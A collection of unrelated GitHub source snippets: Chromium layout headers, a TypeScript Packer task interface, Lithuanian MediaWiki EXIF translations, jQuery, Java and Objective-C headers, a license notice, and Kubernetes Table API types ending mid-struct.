  unsigned base_direction_ : 1;  // TextDirection
  unsigned has_hanging_ : 1;

  // The following bitfields are only to be used by NGPhysicalBoxFragment
  // (it's defined here to save memory, since that class has no bitfields).
  unsigned children_inline_ : 1;
  unsigned has_fragment_items_ : 1;
  unsigned border_edge_ : 4;  // NGBorderEdges::Physical
  unsigned has_borders_ : 1;
  unsigned has_padding_ : 1;
  unsigned is_first_for_node_ : 1;

  // The following are only used by NGPhysicalBoxFragment but are initialized
  // for all types to allow methods using them to be inlined.
  unsigned is_fieldset_container_ : 1;
  unsigned is_legacy_layout_root_ : 1;

  // The following bitfields are only to be used by NGPhysicalTextFragment
  // (it's defined here to save memory, since that class has no bitfields).
  unsigned is_generated_text_ : 1;

  // mutable: ink overflow is computed lazily on otherwise-const fragments.
  mutable unsigned ink_overflow_computed_ : 1;

 private:
  friend struct NGPhysicalFragmentTraits;
  // Invoked when the last reference is released; reached via
  // NGPhysicalFragmentTraits::Destruct() (a friend), not via `delete`.
  void Destroy() const;
};
// Used for return value of traversing fragment tree.
// Used for return value of traversing fragment tree: a fragment paired with
// its accumulated offset from the container box.
struct CORE_EXPORT NGPhysicalFragmentWithOffset {
  DISALLOW_NEW();

  scoped_refptr<const NGPhysicalFragment> fragment;
  // Offset of |fragment| relative to the container box's origin.
  PhysicalOffset offset_to_container_box;

  // The fragment's border-box rect in the container box's coordinate space.
  PhysicalRect RectInContainerBox() const;
};
CORE_EXPORT std::ostream& operator<<(std::ostream&, const NGPhysicalFragment*);
CORE_EXPORT std::ostream& operator<<(std::ostream&, const NGPhysicalFragment&);
#if !DCHECK_IS_ON()
// In non-DCHECK builds the consistency checks compile to no-ops so call sites
// need no conditional compilation; the checking implementations are provided
// elsewhere when DCHECK_IS_ON().
inline void NGPhysicalFragment::CheckType() const {}
inline void NGPhysicalFragment::CheckCanUpdateInkOverflow() const {}
#endif
} // namespace blink
#endif // THIRD_PARTY_BLINK_RENDERER_CORE_LAYOUT_NG_NG_PHYSICAL_FRAGMENT_H_
|
{
"pile_set_name": "Github"
}
|
[bdist_rpm]
packager = Sylvain Thenault <sylvain.thenault@logilab.fr>
provides = pylint
|
{
"pile_set_name": "Github"
}
|
import * as tr from "azure-pipelines-task-lib/toolrunner";
import TaskParameters from "./taskParameters"
// Identifies which template-file provider to use: a built-in template or a
// user-supplied (custom) one.
export enum TemplateFileProviderTypes {
    BuiltIn = 0,
    Custom = 1
}
// Identifies the source of template variables: an Azure service principal
// (AzureSPN) or values taken from task inputs.
export enum VariablesProviderTypes {
    AzureSPN = 0,
    TaskInput = 1
}
// Incremental parser for tool output: parse() is fed output line by line,
// getExtractedOutputs() returns whatever was collected.
export interface IOutputParser {
    // Consume one line of tool output.
    parse(line: string): void;
    // Return the outputs accumulated by previous parse() calls.
    getExtractedOutputs(): any;
}
// Host abstraction tying together the packer tool invocation, its template
// file provider, and the registered template-variable providers.
export interface IPackerHost {
    // Create a ToolRunner configured to invoke packer.
    createPackerTool(): tr.ToolRunner;
    // Run the given command; each output line may be fed to outputParser.
    // NOTE(review): returns a Q.Promise but this module does not import Q —
    // assumes the ambient Q typings are in scope; confirm in the project.
    execTool(command: tr.ToolRunner, outputParser?: IOutputParser): Q.Promise<any>;
    getTemplateFileProvider(): ITemplateFileProvider;
    getTemplateVariablesProviders(): ITemplateVariablesProvider[];
    // Register providers keyed by their type enums.
    registerTemplateFileProvider(providerType: TemplateFileProviderTypes, provider: ITemplateFileProvider);
    registerTemplateVariablesProvider(providerType: VariablesProviderTypes, provider: ITemplateVariablesProvider);
    getTaskParameters(): TaskParameters;
    getStagingDirectory(): string;
}
// Supplies the packer template file and manages its lifecycle.
export interface ITemplateFileProvider {
    // Register this provider with the host.
    register(packerHost: IPackerHost): void;
    // Return the path of the template file to use.
    getTemplateFileLocation(packerHost: IPackerHost): string;
    // Persist an updated copy of the template under a suffixed name.
    saveUpdatedTemplateFile(content: string, newNameSuffix: string): void;
    // Release any temporary resources created by this provider.
    cleanup(): void;
}
// Supplies name/value pairs to substitute into the packer template.
export interface ITemplateVariablesProvider {
    // Register this provider with the host.
    register(packerHost: IPackerHost): void;
    // Resolve the variables this provider contributes.
    getTemplateVariables(packerHost: IPackerHost): Promise<Map<string, string>>;
}
|
{
"pile_set_name": "Github"
}
|
- Review WaveView
- Minor UI changes
- Fixes to artist details layout
|
{
"pile_set_name": "Github"
}
|
{
"@metadata": {
"authors": [
"Eitvys200",
"Garas",
"Homo",
"Hugo.arg",
"Ignas693",
"Matasg",
"Perkunas",
"Tomasdd",
"Vpovilaitis",
"Zygimantus"
]
},
"exif-imagewidth": "Plotis",
"exif-imagelength": "Aukštis",
"exif-bitspersample": "Bitai komponente",
"exif-compression": "Suspaudimo tipas",
"exif-photometricinterpretation": "Taškų struktūra",
"exif-orientation": "Pasukimas",
"exif-samplesperpixel": "Komponentų skaičius",
"exif-planarconfiguration": "Duomenų išdėstymas",
"exif-ycbcrsubsampling": "Y iki C atrankos santykis",
"exif-ycbcrpositioning": "Y ir C pozicija",
"exif-xresolution": "Horizontali raiška",
"exif-yresolution": "Vertikali raiška",
"exif-stripoffsets": "Paveikslėlio duomenų vieta",
"exif-rowsperstrip": "Eilių skaičius juostoje",
"exif-stripbytecounts": "Baitai suspaustoje juostoje",
"exif-jpeginterchangeformat": "JPEG SOI pozicija",
"exif-jpeginterchangeformatlength": "JPEG duomenų baitai",
"exif-whitepoint": "Balto taško chromatiškumas",
"exif-primarychromaticities": "Pagrindinių spalvų chromiškumas",
"exif-ycbcrcoefficients": "Spalvų pristatymo matricos koeficientai",
"exif-referenceblackwhite": "Juodos ir baltos poros nuorodos reikšmės",
"exif-datetime": "Rinkmenos keitimo data ir laikas",
"exif-imagedescription": "Paveikslėlio pavadinimas",
"exif-make": "Kameros gamintojas",
"exif-model": "Kameros modelis",
"exif-software": "Naudota programinė įranga",
"exif-artist": "Autorius",
"exif-copyright": "Autorystės teisių savininkas",
"exif-exifversion": "Exif versija",
"exif-flashpixversion": "Palaikoma Flashpix versija",
"exif-colorspace": "Spalvų pristatymas",
"exif-componentsconfiguration": "kiekvieno komponento reikšmė",
"exif-compressedbitsperpixel": "Paveikslėlio suspaudimo režimas",
"exif-pixelxdimension": "Paveikslėlio plotis",
"exif-pixelydimension": "Vaizdo aukštis",
"exif-usercomment": "Naudotojo komentarai",
"exif-relatedsoundfile": "Susijusi garso byla",
"exif-datetimeoriginal": "Duomenų generavimo data ir laikas",
"exif-datetimedigitized": "Datos ir laiko pervedimas į skaitmeninį formatą",
"exif-subsectime": "Datos ir laiko sekundės dalys",
"exif-subsectimeoriginal": "Duomenų generavimo datos ir laiko sekundės dalys",
"exif-subsectimedigitized": "Pervedimo į skaitmeninį formatą datos ir laiko sekundės dalys",
"exif-exposuretime": "Išlaikymo laikas",
"exif-exposuretime-format": "$1 sek. ($2)",
"exif-fnumber": "F numeris",
"exif-exposureprogram": "Išlaikymo programa",
"exif-spectralsensitivity": "Spektrinis jautrumas",
"exif-isospeedratings": "ISO greitis",
"exif-shutterspeedvalue": "APEX užrakto greičio",
"exif-aperturevalue": "APEX diafragma",
"exif-brightnessvalue": "APEX ryškumas",
"exif-exposurebiasvalue": "Išlaikymo paklaida",
"exif-maxaperturevalue": "Mažiausias lešio F numeris",
"exif-subjectdistance": "Objekto atstumas",
"exif-meteringmode": "Matavimo režimas",
"exif-lightsource": "Šviesos šaltinis",
"exif-flash": "Blykstė",
"exif-focallength": "Židinio nuotolis",
"exif-subjectarea": "Objekto zona",
"exif-flashenergy": "Blykstės energija",
"exif-focalplanexresolution": "Židinio projekcijos X raiška",
"exif-focalplaneyresolution": "Židinio projekcijos Y raiška",
"exif-focalplaneresolutionunit": "Židinio projekcijos raiškos matavimo vienetai",
"exif-subjectlocation": "Objekto vieta",
"exif-exposureindex": "Išlaikymo indeksas",
"exif-sensingmethod": "Jutimo režimas",
"exif-filesource": "Failo šaltinis",
"exif-scenetype": "Scenos tipas",
"exif-customrendered": "Pasirinktinis vaizdo apdorojimas",
"exif-exposuremode": "Išlaikymo režimas",
"exif-whitebalance": "Baltumo balansas",
"exif-digitalzoomratio": "Skaitmeninio priartinimo koeficientas",
"exif-focallengthin35mmfilm": "Židinio nuotolis 35 mm juostoje",
"exif-scenecapturetype": "Scenos fiksavimo tipas",
"exif-gaincontrol": "Scenos kontrolė",
"exif-contrast": "Kontrastas",
"exif-saturation": "Sodrumas",
"exif-sharpness": "Aštrumas",
"exif-devicesettingdescription": "Įrenginio nustatymų aprašas",
"exif-subjectdistancerange": "Objekto nuotolis",
"exif-imageuniqueid": "Unikalusis paveikslėlio ID",
"exif-gpsversionid": "GPS versija",
"exif-gpslatituderef": "Šiaurės ar pietų platuma",
"exif-gpslatitude": "Platuma",
"exif-gpslongituderef": "Rytų ar vakarų ilguma",
"exif-gpslongitude": "Ilguma",
"exif-gpsaltituderef": "Aukščio nuoroda",
"exif-gpsaltitude": "Aukštis",
"exif-gpstimestamp": "GPS laikas (atominis laikrodis)",
"exif-gpssatellites": "Palydovai, naudoti matavimui",
"exif-gpsstatus": "Gaviklio būsena",
"exif-gpsmeasuremode": "Matavimo režimas",
"exif-gpsdop": "Matavimo tikslumas",
"exif-gpsspeedref": "Greičio vienetai",
"exif-gpsspeed": "GPS gaviklio greitis",
"exif-gpstrackref": "Nuoroda judėjimo krypčiai",
"exif-gpstrack": "Judėjimo kryptis",
"exif-gpsimgdirectionref": "Nuoroda vaizdo krypčiai",
"exif-gpsimgdirection": "Nuotraukos kryptis",
"exif-gpsmapdatum": "Panaudoti geodeziniai apžvalgos duomenys",
"exif-gpsdestlatituderef": "Nuoroda paskirties platumai",
"exif-gpsdestlatitude": "Paskirties platuma",
"exif-gpsdestlongituderef": "Nuoroda paskirties ilgumai",
"exif-gpsdestlongitude": "Paskirties ilguma",
"exif-gpsdestbearingref": "Nuoroda į paskirties pelengą",
"exif-gpsdestbearing": "Paskirties pelengas",
"exif-gpsdestdistanceref": "Nuoroda atstumui iki paskirties",
"exif-gpsdestdistance": "Atstumas iki paskirties",
"exif-gpsprocessingmethod": "GPS apdorojimo metodo pavadinimas",
"exif-gpsareainformation": "GPS zonos pavadinimas",
"exif-gpsdatestamp": "GPS data",
"exif-gpsdifferential": "GPS diferiancialo pataisymas",
"exif-jpegfilecomment": "JPEG failas komentarą",
"exif-keywords": "Raktiniai žodžiai",
"exif-worldregioncreated": "Pasaulio regione, kad nuotrauka buvo imtasi",
"exif-countrycreated": "Šalis, kad nuotrauka buvo imtasi",
"exif-countrycodecreated": "Kodas šaliai, kad nuotrauka buvo imtasi",
"exif-provinceorstatecreated": "Provincijos ar nurodyti, kad nuotrauka buvo imtasi",
"exif-citycreated": "Miestas, kad nuotrauka buvo imtasi",
"exif-sublocationcreated": "Sublocation miesto, kad nuotrauka buvo imtasi",
"exif-worldregiondest": "Pasaulio regionas rodomas",
"exif-countrydest": "Šalis rodomas",
"exif-countrycodedest": "Kodas šalies rodomas",
"exif-provinceorstatedest": "Rodoma provincija arba valstija",
"exif-citydest": "Rodomas miestas",
"exif-sublocationdest": "Miesto vietovė rodoma",
"exif-objectname": "Trumpas pavadinimas",
"exif-specialinstructions": "Specialiosios instrukcijos",
"exif-headline": "Antraštė",
"exif-credit": "Padėka/tiekėjas",
"exif-source": "Šaltinis",
"exif-editstatus": "Paveikslėlio redagavimo būsena",
"exif-urgency": "Skuba",
"exif-fixtureidentifier": "Pastovių duomenų pavadinimas",
"exif-locationdest": "Rodoma vietovė",
"exif-locationdestcode": "Rodomos vietovės kodas",
"exif-objectcycle": "Dienos laikas, kuriam skiriamas turinys",
"exif-contact": "Kontaktinė informacija",
"exif-writer": "Rašytojas",
"exif-languagecode": "Kalba",
"exif-iimversion": "IIM versija",
"exif-iimcategory": "Kategorija",
"exif-iimsupplementalcategory": "Papildomos kategorijos",
"exif-datetimeexpires": "Nenaudokite po",
"exif-datetimereleased": "Išleista",
"exif-originaltransmissionref": "Pradinis perdavimo vietos kodas",
"exif-identifier": "Identifikatorius",
"exif-lens": "Naudotas objektyvas",
"exif-serialnumber": "kameros serijinis numeris",
"exif-cameraownername": "Fotoaparato savininkas",
"exif-label": "Etiketė",
"exif-datetimemetadata": "Paskutinį kartą metadata duomenys keisti",
"exif-nickname": "Neoficialus paveikslėlio pavadinimas",
"exif-rating": "Vertinimas (iki 5)",
"exif-rightscertificate": "Teisių valdymo sertifikatas",
"exif-copyrighted": "Autorių teisių statusas",
"exif-copyrightowner": "Autorystės teisių savininkas",
"exif-usageterms": "Naudojimo sąlygos",
"exif-webstatement": "Autorių teisių pareiškimas internete",
"exif-originaldocumentid": "Unikalus ID orginalus dokumentas",
"exif-licenseurl": "Autorių teisių licencijos URL",
"exif-morepermissionsurl": "Alternatyvi licencijavimo informacija",
"exif-attributionurl": "Kai pakartotinai naudojate ši darbą, prašome nurodyti į",
"exif-preferredattributionname": "Kai naudojate ši darbą prašome nurodyti",
"exif-pngfilecomment": "Pastabos dėl PNG rinkmenos",
"exif-disclaimer": "Atsakomybės apribojimas",
"exif-contentwarning": "Turinio įspėjimas",
"exif-giffilecomment": "GIF rinkmenos paaiškinimas",
"exif-intellectualgenre": "Elemento tipas",
"exif-subjectnewscode": "Objektas kodas",
"exif-scenecode": "IPTC scenos kodas",
"exif-event": "Vaizduojamas įvykis",
"exif-organisationinimage": "Vaizduojama organizacija",
"exif-personinimage": "Vaizduojamas asmuo",
"exif-originalimageheight": "Piešinio aukštis prieš apkarpymą",
"exif-originalimagewidth": "Piešinio plotis prieš apkarpymą",
"exif-compression-1": "Nesuspausta",
"exif-compression-2": "CCITT grupės 3 1-Dimensijos Modifikuotas Hafmano duomenų paleidimo ilgio kodavimas.",
"exif-compression-3": "CCITT 3 grupės fakso kodavimas",
"exif-compression-4": "CCITT 4 grupės fakso kodavimas",
"exif-copyrighted-true": "Autorinės teisės",
"exif-copyrighted-false": "Autorinių teisių padėtis nenustatyta",
"exif-photometricinterpretation-1": "Juoda ir balta (Juoda yra 0)",
"exif-unknowndate": "Nežinoma data",
"exif-orientation-1": "Standartinis",
"exif-orientation-2": "Apversta horizontaliai",
"exif-orientation-3": "Pasukta 180°",
"exif-orientation-4": "Apversta vertikaliai",
"exif-orientation-5": "Pasukta 90° prieš laikrodžio rodyklę ir apversta vertikaliai",
"exif-orientation-6": "Pasukta 90° laikrodžio rodyklės kryptimi",
"exif-orientation-7": "Pasukta 90° laikrodžio rodyklės kryptimi ir apversta vertikaliai",
"exif-orientation-8": "Pasukta 90° prieš laikrodžio rodyklę",
"exif-planarconfiguration-1": "stambusis formatas",
"exif-planarconfiguration-2": "plokštuminis formatas",
"exif-xyresolution-i": "$1 taškai colyje",
"exif-xyresolution-c": "$1 taškai centimetre",
"exif-colorspace-65535": "Spalvos nekalibruotos",
"exif-componentsconfiguration-0": "neegzistuoja",
"exif-exposureprogram-0": "Nenurodyta",
"exif-exposureprogram-1": "Rankinė",
"exif-exposureprogram-2": "Paprasta programa",
"exif-exposureprogram-3": "Diafragmos pirmenybė",
"exif-exposureprogram-4": "Užrakto pirmenybė",
"exif-exposureprogram-5": "Kūrybos programa (linkusi į lauko gylį)",
"exif-exposureprogram-6": "Veiksmo programa (linkusi link greito užrakto greičio)",
"exif-exposureprogram-7": "Portreto režimas (nuotraukoms iš arti nepabrėžiant fono)",
"exif-exposureprogram-8": "Peizažo režimas (peizažo nuotraukoms pabrėžiant foną)",
"exif-subjectdistance-value": "$1 metrų",
"exif-meteringmode-0": "Nežinoma",
"exif-meteringmode-1": "Vidurkis",
"exif-meteringmode-2": "Centruotas vidurkis",
"exif-meteringmode-3": "Taškas",
"exif-meteringmode-4": "Daugiataškis",
"exif-meteringmode-5": "Raštas",
"exif-meteringmode-6": "Dalinis",
"exif-meteringmode-255": "Kita",
"exif-lightsource-0": "Nežinomas",
"exif-lightsource-1": "Dienos šviesa",
"exif-lightsource-2": "Fluorescentinis",
"exif-lightsource-3": "Volframas (kaitinamoji lempa)",
"exif-lightsource-4": "Blykstė",
"exif-lightsource-9": "Giedras oras",
"exif-lightsource-10": "Debesuotas oras",
"exif-lightsource-11": "Šešėlis",
"exif-lightsource-12": "Dienos šviesos fluorescentinis (D 5700 – 7100K)",
"exif-lightsource-13": "Dienos baltumo fluorescentinis (N 4600 – 5400K)",
"exif-lightsource-14": "Šalto baltumo fluorescentinis (W 3900 – 4500K)",
"exif-lightsource-15": "Baltas fluorescentinis (WW 3200 – 3700K)",
"exif-lightsource-17": "Standartinis apšvietimas A",
"exif-lightsource-18": "Standartinis apšvietimas B",
"exif-lightsource-19": "Standartinis apšvietimas C",
"exif-lightsource-24": "ISO studijos volframas",
"exif-lightsource-255": "Kitas šviesos šaltinis",
"exif-flash-fired-0": "Blykstė nemirktelėjo",
"exif-flash-fired-1": "Blykstė mirktelėjo",
"exif-flash-return-0": "jokios blyksčių grįžties aptikimo funkcijos",
"exif-flash-return-2": "blykstės grįžtamoji šviesa neaptikta",
"exif-flash-return-3": "blykstės grįžtamoji šviesa aptikta",
"exif-flash-mode-1": "priverstinė blykstė",
"exif-flash-mode-2": "priverstinis blykstės sulaikymas",
"exif-flash-mode-3": "automatinis režimas",
"exif-flash-function-1": "Be blykstės funkcijos",
"exif-flash-redeye-1": "raudonų akių šalinimo režimas",
"exif-focalplaneresolutionunit-2": "coliai",
"exif-sensingmethod-1": "Nenurodytas",
"exif-sensingmethod-2": "Vienalustis spalvų zonos jutiklis",
"exif-sensingmethod-3": "Dvilustis spalvų zonos jutiklis",
"exif-sensingmethod-4": "Trilustis spalvų zonos jutiklis",
"exif-sensingmethod-5": "Nuoseklusis spalvų zonos jutiklis",
"exif-sensingmethod-7": "Trilinijinis jutiklis",
"exif-sensingmethod-8": "Spalvų nuoseklusis linijinis jutiklis",
"exif-filesource-3": "Skaitmeninis fotoaparatas",
"exif-scenetype-1": "Tiesiogiai fotografuotas vaizdas",
"exif-customrendered-0": "Standartinis procesas",
"exif-customrendered-1": "Pasirinktinis procesas",
"exif-exposuremode-0": "Automatinis išlaikymas",
"exif-exposuremode-1": "Rankinis išlaikymas",
"exif-exposuremode-2": "Automatinis skliaustas",
"exif-whitebalance-0": "Automatinis baltumo balansas",
"exif-whitebalance-1": "Rankinis baltumo balansas",
"exif-scenecapturetype-0": "Paprastas",
"exif-scenecapturetype-1": "Peizažas",
"exif-scenecapturetype-2": "Portretas",
"exif-scenecapturetype-3": "Nakties vaizdas",
"exif-gaincontrol-0": "Jokia",
"exif-gaincontrol-1": "Nedidelis pakėlimas",
"exif-gaincontrol-2": "Didelis pakėlimas",
"exif-gaincontrol-3": "Mažas nuleidimas",
"exif-gaincontrol-4": "Didelis nuleidimas",
"exif-contrast-0": "Paprastas",
"exif-contrast-1": "Mažas",
"exif-contrast-2": "Didelis",
"exif-saturation-0": "Paprastas",
"exif-saturation-1": "Mažas sodrumas",
"exif-saturation-2": "Didelis sodrumas",
"exif-sharpness-0": "Paprastas",
"exif-sharpness-1": "Mažas",
"exif-sharpness-2": "Didelis",
"exif-subjectdistancerange-0": "Nežinomas",
"exif-subjectdistancerange-1": "Makro",
"exif-subjectdistancerange-2": "Artimas vaizdas",
"exif-subjectdistancerange-3": "Tolimas vaizdas",
"exif-gpslatitude-n": "Šiaurės platuma",
"exif-gpslatitude-s": "Pietų platuma",
"exif-gpslongitude-e": "Rytų ilguma",
"exif-gpslongitude-w": "Vakarų ilguma",
"exif-gpsaltitude-above-sealevel": "$1 {{PLURAL:$1| metras | metrai}} virš jūros lygio",
"exif-gpsaltitude-below-sealevel": "$1 {{PLURAL:$1| metras | metrai}} žemiau jūros lygio",
"exif-gpsstatus-a": "Matavimas vykdyme",
"exif-gpsstatus-v": "Matuojamas programinis sąveikumas",
"exif-gpsmeasuremode-2": "Dvimatis matavimas",
"exif-gpsmeasuremode-3": "Trimatis matavimas",
"exif-gpsspeed-k": "Kilometrai per valandą",
"exif-gpsspeed-m": "Mylios per valandą",
"exif-gpsspeed-n": "Mazgai",
"exif-gpsdestdistance-k": "Kilometrai",
"exif-gpsdestdistance-m": "Mylios",
"exif-gpsdestdistance-n": "Jūrmylės",
"exif-gpsdop-excellent": "Puikus ($1)",
"exif-gpsdop-good": "Geras ( $1 )",
"exif-gpsdop-moderate": "Vidutinis ($1)",
"exif-gpsdop-fair": "Prastas ($1)",
"exif-gpsdop-poor": "Blogas ( $1 )",
"exif-objectcycle-a": "Tik ryte",
"exif-objectcycle-p": "Tik vakare",
"exif-objectcycle-b": "Ir ryte ir vakare",
"exif-gpsdirection-t": "Tikroji kryptis",
"exif-gpsdirection-m": "Magnetinė kryptis",
"exif-ycbcrpositioning-1": "Centruotas",
"exif-ycbcrpositioning-2": "Bendras išdėstymas",
"exif-dc-contributor": "Autoriai",
"exif-dc-coverage": "Erdvės ar laiko apimtis",
"exif-dc-date": "Data (-os)",
"exif-dc-publisher": "Leidėjas",
"exif-dc-relation": "Susijusi medija",
"exif-dc-rights": "Teisės",
"exif-dc-source": "Šaltinis",
"exif-dc-type": "Laikmenos tipas",
"exif-rating-rejected": "Atmesta",
"exif-isospeedratings-overflow": "Didesnis už 65535",
"exif-iimcategory-ace": "Menas, kultūra ir pramogos",
"exif-iimcategory-clj": "Nusikalstamumas ir įstatymas",
"exif-iimcategory-dis": "Nelaimės ir nelaimingi atsitikimai",
"exif-iimcategory-fin": "Ekonomika ir verslas",
"exif-iimcategory-edu": "Švietimas",
"exif-iimcategory-evn": "Aplinka",
"exif-iimcategory-hth": "Sveikata",
"exif-iimcategory-hum": "Žmogaus interesai",
"exif-iimcategory-lab": "Darbas",
"exif-iimcategory-lif": "Gyvenimo būdas ir laisvalaikis",
"exif-iimcategory-pol": "Politika",
"exif-iimcategory-rel": "Religija ir tikėjimas",
"exif-iimcategory-sci": "Mokslas ir technologijos",
"exif-iimcategory-soi": "Socialiniai klausimai",
"exif-iimcategory-spo": "Sportas",
"exif-iimcategory-war": "Karas, konfliktas ir neramumai",
"exif-iimcategory-wea": "Oras",
"exif-urgency-normal": "Normalus ( $1 )",
"exif-urgency-low": "Žemas ( $1 )",
"exif-urgency-high": "Aukštas ( $1 )",
"exif-urgency-other": "Vartotojo nustatyta pirmenybė ($1)"
}
|
{
"pile_set_name": "Github"
}
|
define([
	"./core",
	"./traversing"
], function( jQuery ) {

// The number of elements contained in the matched element set.
// Kept for backwards compatibility; equivalent to reading .length directly.
jQuery.fn.size = function() {
	return this.length;
};

// Backwards-compatible alias for .addBack().
jQuery.fn.andSelf = jQuery.fn.addBack;

});
|
{
"pile_set_name": "Github"
}
|
package com.vladmihalcea.flexypool.model;
import javax.persistence.Entity;
import javax.persistence.Id;
/**
 * Book - a minimal JPA entity holding a book's identifier and name.
 *
 * @author Vlad Mihalcea
 */
@Entity
public class Book {

    /** Primary key; assigned by the caller (no generation strategy declared). */
    @Id
    private Long id;

    /** Display name of the book. */
    private String name;

    public Long getId() {
        return id;
    }

    public String getName() {
        return name;
    }

    public void setId(Long id) {
        this.id = id;
    }

    public void setName(String name) {
        this.name = name;
    }
}
|
{
"pile_set_name": "Github"
}
|
//******************************************************************************
//
// Copyright (c) 2015 Microsoft Corporation. All rights reserved.
//
// This code is licensed under the MIT License (MIT).
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
//******************************************************************************
#pragma once
#include "ObjectConverter.h"
// Symbolic layout-constraint priority levels. Names and values mirror the
// NSLayoutPriority* constants from AppKit/UIKit (1000 = required).
enum {
    NSLayoutPriorityRequired = 1000,
    NSLayoutPriorityDefaultHigh = 750,
    NSLayoutPriorityDragThatCanResizeWindow = 510,
    NSLayoutPriorityWindowSizeStayPut = 500,
    NSLayoutPriorityDragThatCannotResizeWindow = 490,
    NSLayoutPriorityDefaultLow = 250,
    NSLayoutPriorityFittingSizeCompression = 50,
};
// A constraint priority value; expected range is 0-1000 per the enum above.
typedef float NSLayoutPriority;
// Attributes a layout constraint can relate: edges, dimensions, centers,
// baselines and the margin-relative variants. Mirrors UIKit's
// NSLayoutAttribute enumeration.
typedef enum {
    NSLayoutAttributeLeft = 1,
    NSLayoutAttributeRight,
    NSLayoutAttributeTop,
    NSLayoutAttributeBottom,
    NSLayoutAttributeLeading,
    NSLayoutAttributeTrailing,
    NSLayoutAttributeWidth,
    NSLayoutAttributeHeight,
    NSLayoutAttributeCenterX,
    NSLayoutAttributeCenterY,
    NSLayoutAttributeBaseline,
    // LastBaseline deliberately aliases Baseline; FirstBaseline then
    // continues the sequence at the next integer value.
    NSLayoutAttributeLastBaseline = NSLayoutAttributeBaseline,
    NSLayoutAttributeFirstBaseline,
    NSLayoutAttributeLeftMargin,
    NSLayoutAttributeRightMargin,
    NSLayoutAttributeTopMargin,
    NSLayoutAttributeBottomMargin,
    NSLayoutAttributeLeadingMargin,
    NSLayoutAttributeTrailingMargin,
    NSLayoutAttributeCenterXWithinMargins,
    NSLayoutAttributeCenterYWithinMargins,
    // Sentinel used when an attribute slot is unused (e.g. constant-only
    // constraints in UIKit's model).
    NSLayoutAttributeNotAnAttribute = 0
} NSLayoutAttribute;
// Comparison relation between the two sides of a layout constraint.
typedef enum {
    NSLayoutRelationLessThanOrEqual = -1,
    NSLayoutRelationEqual = 0,
    NSLayoutRelationGreaterThanOrEqual = 1,
} NSLayoutRelation;
// In-memory representation of a single layout constraint. Judging by the
// Init* members it is populated from XIB or storyboard data and later
// converted for NIB output — confirm against the implementation file.
class NSLayoutConstraint : public ObjectConverterSwapper {
public:
    // The two objects being related. NOTE(review): _secondItem is presumably
    // null for single-view constraints (fixed width/height) — confirm.
    XIBObject* _firstItem;
    XIBObject* _secondItem;
    int _firstAttribute; // an NSLayoutAttribute value
    int _secondAttribute; // an NSLayoutAttribute value
    int _relation; // an NSLayoutRelation value
    float _multiplier;
    float _priority; // an NSLayoutPriority value
    float _constant;
    // Symbolic (named) constant; only meaningful when _hasSymbolicConstant
    // is true.
    float _symbolicConstant;
    bool _hasSymbolicConstant;

public:
    NSLayoutConstraint();
    // Populate fields from a XIB-format object.
    virtual void InitFromXIB(XIBObject* obj);
    // Populate fields from a storyboard-format object.
    virtual void InitFromStory(XIBObject* obj);
    virtual void Awaken();
    virtual void ConvertStaticMappings(NIBWriter* writer, XIBObject* obj);
};
|
{
"pile_set_name": "Github"
}
|
Copyright (c) 2015-Present CloudFoundry.org Foundation, Inc. All Rights Reserved.
This project contains software that is Copyright (c) 2014-2015 Pivotal Software, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This project may include a number of subcomponents with separate
copyright notices and license terms. Your use of these subcomponents
is subject to the terms and conditions of each subcomponent's license,
as noted in the LICENSE file.
|
{
"pile_set_name": "Github"
}
|
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// package v1beta1 is alpha objects from meta that will be introduced.
package v1beta1
import (
"k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
)
// TODO: Table does not generate to protobuf because of the interface{} - fix protobuf
// generation to support a meta type that can accept any valid JSON.

// Table is a tabular representation of a set of API resources. The server transforms the
// object into a set of preferred columns for quickly reviewing the objects.
// +protobuf=false
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type Table struct {
	v1.TypeMeta `json:",inline"`
	// Standard list metadata.
	// More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
	// +optional
	v1.ListMeta `json:"metadata,omitempty"`

	// columnDefinitions describes each column in the returned items array. The number of cells per row
	// will always match the number of column definitions.
	ColumnDefinitions []TableColumnDefinition `json:"columnDefinitions"`
	// rows is the list of items in the table. Cells in each row align
	// positionally with columnDefinitions.
	Rows []TableRow `json:"rows"`
}
// TableColumnDefinition contains information about a column returned in the Table.
// +protobuf=false
type TableColumnDefinition struct {
	// name is a human readable name for the column.
	Name string `json:"name"`
	// type is an OpenAPI type definition for this column.
	// See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for more.
	Type string `json:"type"`
	// format is an optional OpenAPI type definition for this column. The 'name' format is applied
	// to the primary identifier column to assist clients in identifying the column that holds
	// the resource name.
	// See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for more.
	Format string `json:"format"`
	// description is a human readable description of this column.
	Description string `json:"description"`
	// priority is an integer defining the relative importance of this column compared to others. Lower
	// numbers are considered higher priority. Columns that may be omitted in limited space scenarios
	// should be given a higher priority.
	Priority int32 `json:"priority"`
}
// TableRow is an individual row in a table.
// +protobuf=false
type TableRow struct {
